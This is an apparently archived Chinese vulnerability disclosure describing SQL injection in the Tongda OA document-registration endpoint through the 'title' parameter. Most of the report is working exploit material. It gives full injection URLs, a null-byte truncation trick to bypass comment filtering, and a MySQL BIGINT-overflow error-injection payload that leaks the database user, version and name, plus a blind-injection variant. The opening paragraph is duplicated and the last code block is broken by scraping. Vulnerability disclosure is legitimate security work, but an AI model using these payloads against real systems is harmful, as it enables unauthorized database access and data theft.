### 简要描述: 此处虽然未过滤单引号,但是还是需要绕过过滤。涉及两个技巧~ 求首页~ ### 详细说明: 厂商:通达信科 测试demo地址:**.**.**.**/ 注入地址: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1 参数title可注入 ``` 我们加入单引号' ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' ``` [<img src="https://images.seebug.org/upload/201510/20005730c9d2997e22c507a0726b90a3df46f4ad.png" alt="1019-30.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/20005730c9d2997e22c507a0726b90a3df46f4ad.png) 返回: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' ``` 普通注入无效,也不能union,要么是被过滤了要么就是直接输出出错SQL语句,如: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ``` [<img src="https://images.seebug.org/upload/201510/200100047b1b7cf8d22d2fe3c17dbedc0cf54ed7.png" alt="1019-31.png"...
### 简要描述: 此处虽然未过滤单引号,但是还是需要绕过过滤。涉及两个技巧~ 求首页~ ### 详细说明: 厂商:通达信科 测试demo地址:**.**.**.**/ 注入地址: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1 参数title可注入 ``` 我们加入单引号' ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' ``` [<img src="https://images.seebug.org/upload/201510/20005730c9d2997e22c507a0726b90a3df46f4ad.png" alt="1019-30.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/20005730c9d2997e22c507a0726b90a3df46f4ad.png) 返回: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' ``` 普通注入无效,也不能union,要么是被过滤了要么就是直接输出出错SQL语句,如: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1' and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ``` [<img src="https://images.seebug.org/upload/201510/200100047b1b7cf8d22d2fe3c17dbedc0cf54ed7.png" alt="1019-31.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/200100047b1b7cf8d22d2fe3c17dbedc0cf54ed7.png) 其他过滤的地方不一一展示了 构造技巧~ 技巧一:注释 普通注释都被过滤如: ``` -- # /* ``` 这里采用一个技巧,直接用截断 ``` ;%00 ``` 技巧二:报错注入,利用MySQL特性 普通的报错带入执行时,不能爆出信息,下面技巧可以爆出数据库信息: ``` (!(select*from(select user())x)-~0) ``` 这里主要用到了MySQL的运算特性,造成整数溢出 其中 ``` ~0表示0的补数,是最大值 ``` [<img src="https://images.seebug.org/upload/201510/20010947a57cea82d90fff4a848c65e0109c6730.png" alt="1019-32.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/20010947a57cea82d90fff4a848c65e0109c6730.png) 其次 ``` !(select*from(select user())x)对查出来的结果进行运算 ``` 用第一个结果减去一个超大数,导致溢出,报错!!! 那么注入EXP为: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select user())x)-~0)>1;%00 ``` [<img src="https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png" alt="1019-33.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png) ``` SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select 'root@**.**.**.**' from dual))) - ~(0))' ``` 得到user: ``` root@**.**.**.** ``` 少了任何一部分都不成功 同样,其他信息 version: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select version())x)-~0)>1;%00 ``` [<img src="https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png" alt="1019-33-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png) ``` SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select '5.5.36-enterprise-commercial-advanced-log' from dual))) - ~(0))' ``` 数据库版本: ``` 5.5.36-enterprise-commercial-advanced-log ``` database: ``` **.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and (!(select*from(select database())x)-~0)>1;%00 ``` [<img src="https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png" alt="1019-33-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png) SQL语句执行错误 #1690: BIGINT UNSIGNED value is out of range in '((not((select 'td_oa' from dual))) - ~(0))' 得到数据库: ``` td_oa ``` ### 漏洞证明: [<img src="https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png" alt="1019-33-database.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2001191388ea48461d88c83dc86eeae9a0edcdcf.png) [<img src="https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png" alt="1019-33-version.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/200117486156b420441acb28364b10aebe03c5cf.png) [<img src="https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png" alt="1019-33.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/20011623d52c9d9898ef8af3bf201a32f1ebe07d.png) 这个点同样可以采用盲注,如这样构造: <code>**.**.**.**/general/document/index.php/recv/register/register_for/?tid=&title=1%' and 1=1 and 'a%'='a</cod [<img src="https://images.seebug.org/upload/201510/2001250602cb77e799a288974e96684eeb3cbef8.png" alt="1019-34.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201510/2001250602cb77e799a288974e96684eeb3cbef8.png) e>
